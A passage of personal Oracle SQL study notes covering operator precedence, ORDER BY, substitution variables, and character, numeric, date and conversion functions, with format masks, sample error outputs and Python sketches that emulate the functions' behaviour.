<span id="cb2-2"><a aria-hidden="true" href="#cb2-2" tabindex="-1"></a> [<span class="kw">NOT</span>] <span class="kw">BETWEEN</span></span>
<span id="cb2-3"><a aria-hidden="true" href="#cb2-3" tabindex="-1"></a> <span class="op">!=</span>,<span class="op"><></span></span>
<span id="cb2-4"><a aria-hidden="true" href="#cb2-4" tabindex="-1"></a> <span class="kw">NOT</span></span>
<span id="cb2-5"><a aria-hidden="true" href="#cb2-5" tabindex="-1"></a> <span class="kw">AND</span></span>
<span id="cb2-6"><a aria-hidden="true" href="#cb2-6" tabindex="-1"></a> <span class="kw">OR</span></span></code></pre></div>
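<p>Because AND sits above OR in the precedence list, a condition such as <code>A and B or C or D and E</code> groups as <code>(A and B) or C or (D and E)</code>. The Python sketch below checks this over every combination of truth values. It relies on Python's <code>and</code> also binding tighter than <code>or</code>, uses plain two-valued logic (NULL is left out), and the function names are made up.</p>

```python
from itertools import product


def as_written(a, b, c, d, e):
    return a and b or c or d and e


def explicit_grouping(a, b, c, d, e):
    # AND is evaluated before OR.
    return (a and b) or c or (d and e)


def or_first_grouping(a, b, c, d, e):
    # What the condition would mean if OR were evaluated before AND.
    return a and (b or c or d) and e


combos = list(product([False, True], repeat=5))
same_as_explicit = all(as_written(*v) == explicit_grouping(*v) for v in combos)
disagreements = [v for v in combos if as_written(*v) != or_first_grouping(*v)]
```

<p>For example, with only C true the row qualifies under the real grouping but would be rejected if OR were applied first.</p>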
<ol start="24" type="1">
<li>SELECT *|{[DISTINCT] column|expression [alias],…} FROM table [WHERE
condition(s)] [ORDER BY {col(s)|expr|numeric_pos} [ASC|DESC] [NULLS
FIRST|LAST]];</li>
<li>The default sort order is assumed to be NULLS LAST for ascending
sorts and NULLS FIRST for descending sorts.</li>
<li>If no ORDER BY clause is specified, the same query executed at
different times may return the same set of results in different row
order, so no assumptions should be made regarding the default row
order.</li>
<li>Positional sorting applies only to columns in the SELECT list that
have a numeric position associated with them</li>
<li>Composite Sorting: order by job_id desc, last_name, 3 desc;</li>
<li>The ampersand character (&) is the symbol chosen to designate a
substitution variable in a statement and precedes the variable name with
no spaces between them</li>
<li>When the statement is executed, the Oracle server processes the
statement, notices a substitution variable, and attempts to resolve this
variable’s value in one of two ways. .. First, it checks whether the
variable is defined in the user session. (The DEFINE command). .. If the
variable is not defined, the user process prompts for a value that will
be substituted in place of the variable. .. Once a value is submitted,
the statement is complete and is executed by the Oracle server. .. The
ampersand substitution variable is resolved at execution time and is
sometimes known as runtime binding or runtime substitution.</li>
<li>SUBSTITUTION: the variable can have any alphanumeric name; supplying
a value of the wrong data type (for example, an unquoted character value)
returns the error ORA-00904: invalid identifier.</li>
<li>Date and Character literals need to be enclosed within quotes. Best
Practice is to define the substitution with quotes so that the date and
character values are quoted without the user having to type the quotes</li>
<li>When the Oracle server encounters a double ampersand substitution
variable, a session value is defined for that variable and you are not
prompted to enter a value to be substituted for this variable in
subsequent references.</li>
<li>To undefine a variable such as SEARCH, you need to use the UNDEFINE
command</li>
<li>any element of a SQL statement is a candidate for substitution</li>
<li>column name references do not require single quotes both when
explicitly specified and when substituted via ampersand
substitution</li>
<li>DEFINE command can be used to retrieve a list of all the variables
currently defined in your SQL session</li>
<li>It can also be used to explicitly define a value for a variable
referenced as a substitution variable by one or more statements during
the lifetime of that session.</li>
<li>SET DEFINE OFF -> Treats &amp; as an ordinary character</li>
<li>The VERIFY command controls whether the substitution variable
submitted is displayed onscreen so you can verify that the correct
substitution has occurred</li>
<li>SET VERIFY ON|OFF</li>
<li>When VERIFY is switched ON and the query is executed, you are prompted
to input a value. Once the value is input and before the statement
commences execution, Oracle displays the clause containing the reference
to the substitution variable as the old clause with its line number and,
immediately below this, the new clause displays the statement containing
the substituted value.</li>
<li>NULLS LAST can be applied in the ORDER BY clause for every column -
ORDER BY 3 DESC NULLS LAST, 2 ASC;</li>
</ol>
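<p>The wildcard and ESCAPE rules for LIKE noted in this chapter can be sketched by translating a pattern into a regular expression. This is a Python approximation with hypothetical helper names (<code>like_to_regex</code>, <code>like</code>); it does not reproduce Oracle's error handling for malformed escape sequences, and it simply treats a NULL value as never matching.</p>

```python
import re


def like_to_regex(pattern, escape=None):
    """Translate a LIKE pattern into an anchored regular expression."""
    parts = []
    i = 0
    while i < len(pattern):
        ch = pattern[i]
        if escape is not None and ch == escape and i + 1 < len(pattern):
            # The character after the escape character is matched literally.
            parts.append(re.escape(pattern[i + 1]))
            i += 2
            continue
        if ch == "%":
            parts.append(".*")   # zero or more characters
        elif ch == "_":
            parts.append(".")    # exactly one character
        else:
            parts.append(re.escape(ch))
        i += 1
    return re.compile("".join(parts), re.DOTALL)


def like(value, pattern, escape=None):
    if value is None:
        return False  # simplification: NULL never satisfies LIKE
    return like_to_regex(pattern, escape).fullmatch(value) is not None


unescaped = like("SALES", "SA_%")                   # "_" matches the "L"
escaped = like("SALES", "SA\\_%", escape="\\")      # now a literal "_" is required
literal_hit = like("SA_REP", "SA\\_%", escape="\\")
```

<p>The same pattern therefore selects different rows depending on whether the underscore is escaped, which is the usual reason for adding an ESCAPE clause.</p>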
<h3 id="chapter-4">CHAPTER 4</h3>
<ol type="1">
<li>case conversion - LOWER, UPPER, and INITCAP</li>
<li>character manipulation - LENGTH, CONCAT, SUBSTR, INSTR, LPAD, RPAD,
TRIM, and REPLACE</li>
<li>CONCAT takes only two strings as parameters</li>
<li>SUBSTR(string, start position, number of characters) - 1 indexed ..
if the start position lies beyond the end of the string -> returns NULL .. if the length is
larger than what remains, returns only the available characters</li>
<li>INSTR -> similar to indexOf -> INSTR(source string, search
item, [start position],[nth occurrence of search item]) -> returns 0
if not found</li>
<li>LPAD(string, length after padding, padding string) and RPAD(string,
length after padding, padding string)</li>
<li>TRIM - > by default trims spaces TRIM(‘#’ from ‘#PASS#WORD##’)
-> ‘PASS#WORD’</li>
<li>REPLACE(string, search item, replacement item) - All the
instances</li>
<li>ROUND, TRUNC, MOD - Numeric functions</li>
<li>ROUND(number, decimal precision) - round(42.39,1) = 42.4 ->
>=5 will be rounded to its ceiling</li>
<li>TRUNC -> just drops the additional numerals - trunc(42.39,1) =
42.3</li>
<li>MOD(dividend, divisor) -> mod(42,10) = 2</li>
<li>MONTHS_BETWEEN, ADD_MONTHS, LAST_DAY, NEXT_DAY, SYSDATE, ROUND, and
TRUNC -> date functions</li>
<li>MONTHS_BETWEEN(greater_date, smaller_date) ->
MONTHS_BETWEEN(‘2-JAN-2008’,‘01-JAN-2008’) -> approximately .0323 (1/31
of a month) -> returned as a decimal value. Need to TRUNC to get only
the whole MONTHS value</li>
<li>LAST_DAY(date 1) function returns the last day of the month that the
specified date falls into</li>
<li>NEXT_DAY(date 1, day of the week) returns the date on which the next
specified day of the week falls after the given date (if day of the week
is not valid, throws error)</li>
<li>SYSDATE function takes no parameters and returns a date value that
represents the current server date and time</li>
<li>ROUND(date, date precision format) and TRUNC(date, date precision
format) round and truncate a given date value to the nearest date
precision format like day, month, or year:</li>
</ol>
<div class="sourceCode" id="cb3"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb3-1"><a aria-hidden="true" href="#cb3-1" tabindex="-1"></a><span class="fu">sysdate</span> <span class="op">=</span> <span class="dv">17</span><span class="op">-</span><span class="dt">DEC</span><span class="op">-</span><span class="dv">2007</span></span>
<span id="cb3-2"><a aria-hidden="true" href="#cb3-2" tabindex="-1"></a><span class="fu">round</span>(<span class="fu">sysdate</span>,<span class="st">'month'</span>) <span class="op">=</span> <span class="dv">01</span><span class="op">-</span>JAN<span class="op">-</span><span class="dv">2008</span></span>
<span id="cb3-3"><a aria-hidden="true" href="#cb3-3" tabindex="-1"></a><span class="fu">trunc</span>(<span class="fu">sysdate</span>,<span class="st">'month'</span>) <span class="op">=</span> <span class="dv">01</span><span class="op">-</span><span class="dt">DEC</span><span class="op">-</span><span class="dv">2007</span></span>
<span id="cb3-4"><a aria-hidden="true" href="#cb3-4" tabindex="-1"></a>[Works <span class="kw">only</span> <span class="kw">in</span> <span class="dv">11</span>g]</span></code></pre></div>
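<p>The character function rules in this chapter (1-indexed SUBSTR, INSTR
returning 0 when nothing is found, LPAD/RPAD truncating when the target
length is too short) can be sketched in Python. This is only an
emulation written for these notes, not Oracle code: the function names
are hypothetical, <code>None</code> stands in for NULL, and
<code>instr</code> handles positive start positions only.</p>

```python
def substr(s, start, length=None):
    """Rough emulation of Oracle SUBSTR (1-indexed; None stands in for NULL)."""
    if start == 0:
        start = 1                       # Oracle treats position 0 as position 1
    if start < 0:
        start = len(s) + start + 1      # negative: count back from the end
    if start < 1 or start > len(s):
        return None                     # start position does not exist
    if length is None:
        return s[start - 1:]
    if length < 1:
        return None
    return s[start - 1:start - 1 + length]


def instr(s, search, start=1, nth=1):
    """Rough emulation of Oracle INSTR for positive start positions."""
    pos = start - 1                     # convert to a 0-based offset
    for _ in range(nth):
        pos = s.find(search, pos)
        if pos == -1:
            return 0                    # not found
        pos += 1                        # 1-based hit; next search starts after it
    return pos


def lpad(s, n, pad=" "):
    """Pad on the left to length n, or cut to the first n characters."""
    if n <= len(s):
        return s[:n]
    return (pad * n)[: n - len(s)] + s


def rpad(s, n, pad=" "):
    """Pad on the right to length n, or cut to the first n characters."""
    if n <= len(s):
        return s[:n]
    return s + (pad * n)[: n - len(s)]


print(substr("abcdef", 2, 3), instr("PASS#WORD##", "#"), lpad("abc", 5, "*"))
```

<p>Keeping the 1-based positions in the Python helpers makes it easier
to compare their results with what a query against dual returns.</p>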
<ol start="19" type="1">
<li><p>Oracle’s implementation of SQL is compliant with the ANSI:1999
(American National Standards Institute) standard for SQL. .. More
recently, it claimed partial compliance to the SQL:2003 standard
endorsed by both ISO (International Organization for Standardization)
and ANSI. .. SQL functions have been standardized, and Oracle has
documented those that are fully or partially compliant to the SQL:2003
standard.</p></li>
<li><p>Character Case Conversion Functions - If parameters are numeric
or date value, it is implicitly converted into a string.</p></li>
<li><p>select lower(‘The SUM ’||‘100+100’||‘ = ’||(100+100)) from dual
-> the sum 100+100 = 200. Expressions inside parentheses are evaluated
before concatenation</p></li>
<li><p>(SYSDATE+2) -> Adds two days</p></li>
<li><p>select initcap(‘init cap or init_cap or init%cap’) from dual
-> Init Cap Or Init_Cap Or Init%Cap .. space, _, %, !, $ are all used
as word separators. Punctuation or special characters are regarded as
valid word separators.</p></li>
<li><p>concat(1+2.14,’ approximates pi’) -> 3.14 approximates
pi</p></li>
<li><p>LPAD(s, n, p) and RPAD(s, n, p), .. if the parameter n is smaller
than or equal to the length of the source string s, then no padding
occurs and only the first n characters of s are returned</p></li>
<li><p>TRIM([trailing|leading|both] trimstring from s). .. TRIM(trailing
trimstring from s) removes all occurrences of trimstring from the end of
the string s if it is present .. TRIM(leading trimstring from s) removes
all occurrences of trimstring from the beginning of the string s if it
is present. .. TRIM(both trimstring from s) removes all occurrences of
trimstring from the beginning and end of the string s if it is present
.. [both appears to be optional]</p></li>
<li><p>INSTR(source string, search string, [search start position], [nth
occurrence]) .. A negative start position counts back from the end of
the string and searches backward from there; the returned position is
still counted from the beginning of the string .. If the occurrence is
omitted, it defaults to 1</p></li>
<li><p>SUBSTR(source string, start position, [number of characters to
extract]) -> a negative start position is counted back from the end of
the string</p></li>
<li><p>REPLACE(source string, search item, [replacement term]) If the
replacement term parameter is omitted, each occurrence of the search
item is removed from the source string</p></li>
<li><p>If the specified decimal precision is n, the digit significant to
the rounding is found (n + 1) places to the RIGHT of the decimal point.
.. If it is negative, the digit significant to the rounding is found n
places to the LEFT of the decimal point. .. If the numeric value of the
significant digit is greater than or equal to 5, a “round up” occurs,
else a “round down” occurs. .. round(1301.916718,-3) -> 1000 ..
round(1601.916718,-3) -> 2000 .. round(1601.916718) ->
1602</p></li>
<li><p>A numeric truncation is different from rounding because the
resulting value drops the numbers at the decimal precision specified and
does not attempt to round up or down if the decimal precision is
positive. .. However, if the decimal precision specified (n) is
negative, the input value is zeroed down from the nth decimal position.
.. trunc(1301.916718,-3) -> 1000 .. trunc(1601.916718,-3) -> 1000
.. trunc(1601.916718) -> 1601</p></li>
<li><p>The MOD function returns the numeric remainder of a division
operation .. If the divisor is zero, no division by zero error is
raised and the MOD function returns the dividend .. If the divisor
is larger than the dividend, then the MOD function returns the dividend
as its result .. MOD(5.2,3) -> 2.2 .. MOD(7,0) -> 7 [as observed in
10g] .. MOD(0,7) -> 0 .. MOD(7,35) -> 7</p></li>
<li><p>The default format of the results comprises two digits that
represent the day, a three-letter abbreviation of the month, and two
digits representing the year component. .. By default, these components
are separated with hyphens in SQL*Plus and forward slashes in SQL
Developer</p></li>
<li><p>Date Format Mask</p></li>
</ol>
<div class="sourceCode" id="cb4"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb4-1"><a aria-hidden="true" href="#cb4-1" tabindex="-1"></a> DD <span class="dt">Day</span> <span class="kw">of</span> <span class="kw">the</span> <span class="dt">month</span></span>
<span id="cb4-2"><a aria-hidden="true" href="#cb4-2" tabindex="-1"></a> MON <span class="dt">Month</span> <span class="kw">of</span> <span class="kw">the</span> <span class="dt">year</span></span>
<span id="cb4-3"><a aria-hidden="true" href="#cb4-3" tabindex="-1"></a> YY Two<span class="op">-</span>digit <span class="dt">year</span></span>
<span id="cb4-4"><a aria-hidden="true" href="#cb4-4" tabindex="-1"></a> YYYY Four<span class="op">-</span>digit <span class="dt">year</span> <span class="kw">including</span> century</span>
<span id="cb4-5"><a aria-hidden="true" href="#cb4-5" tabindex="-1"></a> RR Two<span class="op">-</span>digit <span class="dt">year</span> (<span class="dt">Year</span> <span class="dv">2000</span>–compliant)</span>
<span id="cb4-6"><a aria-hidden="true" href="#cb4-6" tabindex="-1"></a> CC Two<span class="op">-</span>digit century</span>
<span id="cb4-7"><a aria-hidden="true" href="#cb4-7" tabindex="-1"></a> HH Hours <span class="kw">with</span> AM <span class="kw">and</span> PM</span>
<span id="cb4-8"><a aria-hidden="true" href="#cb4-8" tabindex="-1"></a> HH24 Twenty<span class="op">-</span>four<span class="op">-</span><span class="kw">hour</span> <span class="dt">time</span></span>
<span id="cb4-9"><a aria-hidden="true" href="#cb4-9" tabindex="-1"></a> MI Minutes</span>
<span id="cb4-10"><a aria-hidden="true" href="#cb4-10" tabindex="-1"></a> SS Seconds</span></code></pre></div>
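<p>The numeric ROUND, TRUNC and MOD rules noted earlier in this chapter
can be checked with a small Python sketch. It only emulates the
described behaviour with the <code>decimal</code> module; the names
<code>ora_round</code>, <code>ora_trunc</code> and <code>ora_mod</code>
are hypothetical helpers, and the zero-divisor branch assumes that MOD
returns the dividend.</p>

```python
from decimal import Decimal, ROUND_DOWN, ROUND_HALF_UP


def _quantum(places):
    # Exponent for the requested precision: 1 -> 0.1, 0 -> 1, -3 -> 1E+3
    return Decimal(1).scaleb(-places)


def ora_round(value, places=0):
    """Round half away from zero at the given decimal precision."""
    return Decimal(str(value)).quantize(_quantum(places), rounding=ROUND_HALF_UP)


def ora_trunc(value, places=0):
    """Drop digits beyond the given decimal precision without rounding."""
    return Decimal(str(value)).quantize(_quantum(places), rounding=ROUND_DOWN)


def ora_mod(dividend, divisor):
    """Remainder of a division; a zero divisor yields the dividend (assumed)."""
    n2, n1 = Decimal(str(dividend)), Decimal(str(divisor))
    if n1 == 0:
        return n2
    return n2 % n1      # Decimal remainder keeps the sign of the dividend


print(ora_round(42.39, 1), ora_trunc(42.39, 1), ora_mod(42, 10))
print(ora_round(1601.916718, -3), ora_trunc(1601.916718, -3))
```

<p>A negative precision moves the rounding digit to the left of the
decimal point, which is why the same input rounds to 2000 but truncates
to 1000.</p>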
<ol start="35" type="1">
<li><p>The SYSDATE function returns the DD-MON-RR components of the
current system date</p></li>
<li><p>Date1 - Date2 = Num1; Date1 - Num1 = Date2; Date1 = Date2 +
Num1;</p></li>
<li><p>Add a fraction of a day to add hours, for example SYSDATE + 6/24
adds six hours</p></li>
<li><p>MONTHS_BETWEEN(start date, end date)</p></li>
<li><p>ADD_MONTHS (start date, number of months) .. The number of months
may be negative, resulting in a target date earlier than the start date
being returned. .. The number of months may be fractional, but the
fractional component is ignored and the integer component is
used</p></li>
<li><p>NEXT_DAY (start date, day of the week) .. The acceptable values
are determined by the NLS_DATE_LANGUAGE database parameter but the
default values are at least the first three characters of the day name
or integer values, where 1 represents Sunday, 2 represents Monday, and
so on. .. NEXT_DAY(‘02-JAN-2009’,‘WEDNE’) -> Works using the First
three chars ‘WED’</p></li>
<li><p>LAST_DAY(start date)</p></li>
<li><p>ROUND(source date, [date precision format]) -> [No implicit
conversion for DATE] .. The date precision format parameter specifies
the degree of rounding and is optional. If it is absent, the default
degree of rounding is day. .. The date precision formats include century
(CC), year (YYYY or YEAR), quarter (Q), month (MM or MONTH), week (W),
day (DD), hour (HH), and minute (MI)</p></li>
<li><p>Rounding up to century is equivalent to adding one to the current
century. .. Rounding up to the next month occurs if the day component is
greater than 15, else rounding down to the beginning of the
current month occurs. .. If the month falls between one and six, then
rounding to year returns the date at the beginning of the current year,
else it returns the date at the beginning of the following year</p></li>
<li><p>TRUNC(source date, [date precision format]) .. The date precision
format parameter specifies the degree of truncation and is optional. ..
If it is absent, the default degree of truncation is day .. Any time
component of the source date is set to midnight or 00:00:00 .. TRUNC is
similar to ROUND, except it is always the FLOOR and never the CEILING ..
TRUNC(TO_DATE(‘31-JAN-2009’),‘MM’) -> 01-JAN-2009</p></li>
<li><p>Functions do not always need parameters (SYSDATE takes
none)</p></li>
</ol>
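<p>The date arithmetic and the month-level ROUND, TRUNC and LAST_DAY
rules above can be sketched with Python's <code>datetime</code>. This
is an illustration of the rules as written in these notes, not of
Oracle's implementation; the helper names are hypothetical.</p>

```python
import calendar
from datetime import datetime, timedelta


def trunc_month(d):
    """TRUNC(date, 'MONTH'): first day of the month at midnight."""
    return d.replace(day=1, hour=0, minute=0, second=0, microsecond=0)


def round_month(d):
    """ROUND(date, 'MONTH'): round up when the day is greater than 15."""
    first = trunc_month(d)
    if d.day > 15:
        # Jump past the end of the month, then snap back to day 1
        return (first + timedelta(days=32)).replace(day=1)
    return first


def last_day(d):
    """LAST_DAY(date): last day of the month the date falls into."""
    return d.replace(day=calendar.monthrange(d.year, d.month)[1])


sample = datetime(2007, 12, 17, 10, 30)
print(round_month(sample))                  # rounds up into the next month
print(trunc_month(sample))                  # start of the current month
print(sample + timedelta(days=6 / 24))      # date + 6/24 adds six hours
print((datetime(2008, 1, 2) - datetime(2008, 1, 1)).days)  # date - date = days
```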
<h3 id="chapter-5">Chapter 5</h3>
<ol type="1">
<li>length(1234) -> implicit conversion for numbers and dates to char
-> 4 is the result</li>
<li>mod(‘11’,2) -> implicit conversion - .. mod(‘$11’,2) ->
ORA-1722: invalid number</li>
<li>Implicit date conversion should not have Time parameters [Check
this]. Implicit conversion for dates can occur if the pattern follows
<code>[D|DD] separator1 [MON|MONTH] separator2 [R|RR|YY|YYYY]</code>
<em>separator1 and separator2 elements may be most punctuation marks,
spaces, and tabs</em></li>
</ol>
<div class="sourceCode" id="cb5"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb5-1"><a aria-hidden="true" href="#cb5-1" tabindex="-1"></a><span class="fu">add_months</span>(<span class="st">'1\january/8'</span>,<span class="dv">1</span>) <span class="op">-></span> <span class="dv">01</span><span class="op">/</span>FEB<span class="op">/</span><span class="dv">08</span></span>
<span id="cb5-2"><a aria-hidden="true" href="#cb5-2" tabindex="-1"></a><span class="fu">months_between</span>(<span class="st">'13*jan*8'</span>, <span class="st">'13/mar/2008'</span>) <span class="op">-></span> <span class="op">-</span><span class="dv">2</span></span>
<span id="cb5-3"><a aria-hidden="true" href="#cb5-3" tabindex="-1"></a><span class="fu">add_months</span>(<span class="st">'01$jan/08'</span>,<span class="dv">1</span>) <span class="op">-></span> <span class="dv">01</span><span class="op">/</span>FEB<span class="op">/</span><span class="dv">08</span></span>
<span id="cb5-4"><a aria-hidden="true" href="#cb5-4" tabindex="-1"></a><span class="fu">add_months</span>(<span class="st">'13!jana08'</span>,<span class="dv">1</span>) <span class="op">-></span> ORA<span class="op">-</span><span class="dv">1841</span>: (<span class="kw">full</span>) <span class="dt">year</span> must be <span class="kw">between</span> –<span class="dv">4713</span> <span class="kw">and</span> <span class="op">+</span><span class="dv">9999</span> <span class="kw">and</span> <span class="kw">not</span> be <span class="dv">0</span></span>
<span id="cb5-5"><a aria-hidden="true" href="#cb5-5" tabindex="-1"></a>jana <span class="kw">is</span> <span class="kw">not</span> a valid <span class="dt">month</span> <span class="op">-></span> <span class="kw">only</span> <span class="dv">3</span> characters <span class="kw">or</span> <span class="kw">full</span> <span class="dt">month</span> <span class="kw">is</span> allowed</span>
<span id="cb5-6"><a aria-hidden="true" href="#cb5-6" tabindex="-1"></a><span class="fu">add_months</span>(<span class="st">'24-JAN-09 18:45'</span>,<span class="dv">1</span>) <span class="op">-></span> ORA<span class="op">-</span><span class="dv">1830</span>: <span class="dt">date</span> format picture ends <span class="kw">before</span> converting entire input string</span></code></pre></div>
<ol start="4" type="1">
<li>Optional national language support parameters (nls_parameters) are
useful for specifying the language and format in which the names of date
and numeric elements are returned</li>
<li>A publicly available view called NLS_SESSION_PARAMETERS contains
the NLS parameters for your current session. The default NLS_CURRENCY
value is the dollar symbol, but this can be changed at the user session
level: ALTER SESSION set NLS_CURRENCY=‘GBP’;</li>
<li><code>TO_CHAR(number1, [format], [nls_parameter])</code></li>
</ol>
<div class="sourceCode" id="cb6"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb6-1"><a aria-hidden="true" href="#cb6-1" tabindex="-1"></a>Formats</span>
<span id="cb6-2"><a aria-hidden="true" href="#cb6-2" tabindex="-1"></a> <span class="dv">9</span> <span class="dt">Numeric</span> width</span>
<span id="cb6-3"><a aria-hidden="true" href="#cb6-3" tabindex="-1"></a> <span class="dv">0</span> Displays <span class="kw">leading</span> zeros Ex: <span class="dv">09999</span> <span class="dv">0012</span> <span class="dv">00012</span></span>
<span id="cb6-4"><a aria-hidden="true" href="#cb6-4" tabindex="-1"></a> . Position <span class="kw">of</span> <span class="dt">decimal</span> point</span>
<span id="cb6-5"><a aria-hidden="true" href="#cb6-5" tabindex="-1"></a> D <span class="dt">Decimal</span> separator position (period <span class="kw">is</span> <span class="kw">default</span>)</span>
<span id="cb6-6"><a aria-hidden="true" href="#cb6-6" tabindex="-1"></a> , Position <span class="kw">of</span> comma symbol</span>
<span id="cb6-7"><a aria-hidden="true" href="#cb6-7" tabindex="-1"></a> G <span class="kw">Group</span> separator position (comma <span class="kw">is</span> <span class="kw">default</span>)</span>
<span id="cb6-8"><a aria-hidden="true" href="#cb6-8" tabindex="-1"></a> $ Dollar <span class="fu">sign</span></span>
<span id="cb6-9"><a aria-hidden="true" href="#cb6-9" tabindex="-1"></a> L <span class="kw">Local</span> currency</span>
<span id="cb6-10"><a aria-hidden="true" href="#cb6-10" tabindex="-1"></a> MI Position <span class="kw">of</span> <span class="kw">minus</span> <span class="fu">sign</span> <span class="cf">for</span> negatives</span>
<span id="cb6-11"><a aria-hidden="true" href="#cb6-11" tabindex="-1"></a> PR Wrap negatives <span class="kw">in</span> parentheses</span>
<span id="cb6-12"><a aria-hidden="true" href="#cb6-12" tabindex="-1"></a>EEEE Scientific notation [Must be <span class="kw">only</span> <span class="dv">4</span> E<span class="st">'s and always gives in 1.xxxxxE+10 format]</span></span>
<span id="cb6-13"><a aria-hidden="true" href="#cb6-13" tabindex="-1"></a><span class="st"> U nls_dual_currency [if nls_dual_currency value is set]</span></span>
<span id="cb6-14"><a aria-hidden="true" href="#cb6-14" tabindex="-1"></a><span class="st"> V Multiplies by 10^n (n is the number of nines after V) Ex: 9999V99 3040 304000</span></span>
<span id="cb6-15"><a aria-hidden="true" href="#cb6-15" tabindex="-1"></a><span class="st"> S + or - sign is prefixed</span></span></code></pre></div>
<p>.. When a format mask is smaller than the number being converted, a
string of hash symbols is returned instead. .. When a format mask
contains fewer fractional components than the number, it is first
rounded to the number of decimal places in the format mask before being
converted.</p>
<ol start="7" type="1">
<li>TO_CHAR(date1, [format], [nls_parameter]) -> Default is
DD/MON/RR</li>
</ol>
<p>‘Month’ -> January .. ‘MOnth’ -> JANUARY .. ‘month’ -> january</p>
<p>‘Month’ -> padded with spaces .. ‘fmMonth’ -> Not padded with
spaces</p>
<p>Y-YYYY -> Year digits .. RR -> 2 digit year .. YEAR -> Case
Sensitive Full Year spelling .. MM, MON, MONTH -> 2 digit, Three char,
full month -> case sensitive .. D, DD, DDD -> day of week, month,
year .. DY -> 3 letter abbreviation .. DAY -> Case Sensitive day</p>
<p>only DAY, MONTH, YEAR are case sensitive AND PADDED NOT the shorter
forms</p>
<p>W, WW -> week of month, year .. Q -> Quarter .. CC -> Century .. S
before CC, YYYY, YEAR -> sign (-) for BC .. I-IYYY -> ISO year dates
for Y-YYYY .. BC, AD, B.C. and A.D. -> to display BC or AD .. J ->
Julian Day -> days since 31 December 4713 BC .. IW -> ISO standard
week (1 to 53) .. RM -> Roman numeral month</p>
<p>AM, PM, A.M. and P.M. -> Meridian Indicators .. HH, HH12 and HH24
-> Hour of day, 1-12 hours, and 0-23 hours .. MI, SS, SSSSS ->
Minutes, Seconds, Seconds past midnight</p>
<div class="sourceCode" id="cb7"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb7-1"><a aria-hidden="true" href="#cb7-1" tabindex="-1"></a> <span class="op">-</span> <span class="op">/</span> . , ? # ! <span class="op">-></span> Punctuation marks <span class="cf">for</span> separators</span>
<span id="cb7-2"><a aria-hidden="true" href="#cb7-2" tabindex="-1"></a> <span class="ot">"any literal"</span> <span class="op">-></span> simply displays <span class="kw">the</span> <span class="dt">character</span> literal</span>
<span id="cb7-3"><a aria-hidden="true" href="#cb7-3" tabindex="-1"></a> TH <span class="op">-></span> positional <span class="kw">or</span> ordinal text <span class="op">-></span> <span class="dv">12</span>th</span>
<span id="cb7-4"><a aria-hidden="true" href="#cb7-4" tabindex="-1"></a> SP <span class="op">-></span> spelled <span class="kw">out</span> <span class="dt">number</span></span>
<span id="cb7-5"><a aria-hidden="true" href="#cb7-5" tabindex="-1"></a> THSP <span class="kw">or</span> SPTH <span class="op">-></span> Spelled <span class="kw">out</span> <span class="kw">and</span> Ordinal <span class="dt">number</span> <span class="op">-></span> twelfth</span></code></pre></div>
<ol start="8" type="1">
<li>TO_DATE(string1, [format], [nls_parameter])</li>
</ol>
<div class="sourceCode" id="cb8"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb8-1"><a aria-hidden="true" href="#cb8-1" tabindex="-1"></a><span class="fu">to_date</span>(<span class="st">'25-DEC'</span>) <span class="op">-></span> ORA<span class="op">-</span><span class="dv">01840</span>: input <span class="fu">value</span> <span class="kw">not</span> <span class="dt">long</span> enough <span class="cf">for</span> <span class="dt">date</span> format</span>
<span id="cb8-2"><a aria-hidden="true" href="#cb8-2" tabindex="-1"></a><span class="fu">to_date</span>(<span class="st">'25-DEC'</span>, <span class="st">'DD-MON'</span>) <span class="op">-></span> <span class="dv">25</span><span class="op">-</span><span class="dt">DEC</span><span class="op">-</span><span class="dv">2009</span></span>
<span id="cb8-3"><a aria-hidden="true" href="#cb8-3" tabindex="-1"></a><span class="fu">to_date</span>(<span class="st">'25-DEC-10'</span>, <span class="st">'fxDD-MON-YYYY'</span>) <span class="op">-></span> ORA<span class="op">-</span><span class="dv">01862</span>: <span class="kw">the</span> <span class="dt">numeric</span> <span class="fu">value</span> does <span class="kw">not</span> match <span class="kw">the</span> <span class="fu">length</span> <span class="kw">of</span> <span class="kw">the</span> format item</span>
<span id="cb8-4"><a aria-hidden="true" href="#cb8-4" tabindex="-1"></a> fx <span class="op">-></span> Makes strict checking</span>
<span id="cb8-5"><a aria-hidden="true" href="#cb8-5" tabindex="-1"></a><span class="fu">to_date</span>(<span class="st">'25-DEC-10'</span>, <span class="st">'DD-MON-YYYY'</span>) <span class="op">-></span> <span class="dv">25</span><span class="op">-</span><span class="dt">DEC</span><span class="op">-</span><span class="dv">10</span> <span class="op">-></span> takes <span class="kw">as</span> <span class="dv">0010</span></span>
<span id="cb8-6"><a aria-hidden="true" href="#cb8-6" tabindex="-1"></a></span>
<span id="cb8-7"><a aria-hidden="true" href="#cb8-7" tabindex="-1"></a>Formats similar <span class="kw">to</span> Point <span class="dv">7</span> used <span class="cf">for</span> <span class="fu">TO_CHAR</span></span></code></pre></div>
<ol start="9" type="1">
<li>TO_NUMBER(string1, [format], [nls_parameter])</li>
</ol>
<div class="sourceCode" id="cb9"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb9-1"><a aria-hidden="true" href="#cb9-1" tabindex="-1"></a><span class="fu">to_number</span>(<span class="st">'$1,000.55'</span>) <span class="op">-></span> ORA<span class="op">-</span><span class="dv">1722</span>: invalid <span class="dt">number</span>.</span>
<span id="cb9-2"><a aria-hidden="true" href="#cb9-2" tabindex="-1"></a><span class="fu">to_number</span>(<span class="st">'$1,000.55'</span>,<span class="st">'$999,999.99'</span>) <span class="op">-></span> <span class="fl">1000.55</span></span>
<span id="cb9-3"><a aria-hidden="true" href="#cb9-3" tabindex="-1"></a></span>
<span id="cb9-4"><a aria-hidden="true" href="#cb9-4" tabindex="-1"></a><span class="cf">If</span> you <span class="fu">convert</span> a <span class="dt">number</span> <span class="kw">using</span> a shorter format mask, an error <span class="kw">is</span> returned <span class="op">-></span> ORA<span class="op">-</span><span class="dv">1722</span>: invalid <span class="dt">number</span>.</span>
<span id="cb9-5"><a aria-hidden="true" href="#cb9-5" tabindex="-1"></a></span>
